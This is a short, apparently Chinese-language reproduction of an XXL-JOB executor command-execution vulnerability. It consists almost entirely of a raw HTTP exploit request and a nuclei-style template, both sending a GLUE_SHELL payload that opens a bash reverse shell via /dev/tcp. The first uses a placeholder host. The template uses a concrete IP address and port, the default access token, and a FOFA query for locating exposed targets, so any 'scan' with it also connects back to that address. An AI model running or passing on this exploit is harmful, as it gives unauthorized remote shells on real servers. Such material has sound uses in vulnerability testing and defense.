XXL-JOB命令执行漏洞复现

POST /run HTTP/1.1Host: ip:10001User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/jsonContent-Length: 410{  "jobId": 1,  "executorHandler": "demoJobHandler",  "executorParams": "demoJobHandler",  "executorBlockStrategy": "COVER_EARLY",  "executorTimeout": 0,  "logId": 1,  "logDateTime": 1586629003729,  "glueType": "GLUE_SHELL",  "glueSource": "bash -c '/bin/bash -i >& /dev/tcp/vps/port 0>&1'",  "glueUpdatetime": 1586699003758,  "broadcastIndex": 0,  "broadcastTotal": 0}

id: xxl-job_rceinfo:  name: xxl_job_rce  author: joyboy  severity: critical  description: http://xxx.xxx.xxx/run  metadata:    max-request: 1    fofa-query: body="{"code":500,"msg":"invalid request, HttpMethod not support."}" || title="任务调度中心"    verified: true  tags: rcerequests:  - raw:      - |-        POST /run HTTP/1.1        Host: {{Hostname}}        Content-Type: application/json        xxl.job.accessToken: default_token        {          "jobId": 1,          "executorHandler": "demoJobHandler",          "executorParams": "demoJobHandler",          "executorBlockStrategy": "COVER_EARLY",          "executorTimeout": 0,          "logId": 1,          "logDateTime": 1586629003729,          "glueType": "GLUE_SHELL",          "glueSource": "bash -c '/bin/bash -i >& /dev/tcp/104.244.94.132/3344 0>&1'",          "glueUpdatetime": 1586699003758,          "broadcastIndex": 0,          "broadcastTotal": 0        }    req-condition: true    matchers:      - type: dsl        condition: and        dsl:          - 'contains((body), ":200}") && status_code == 200'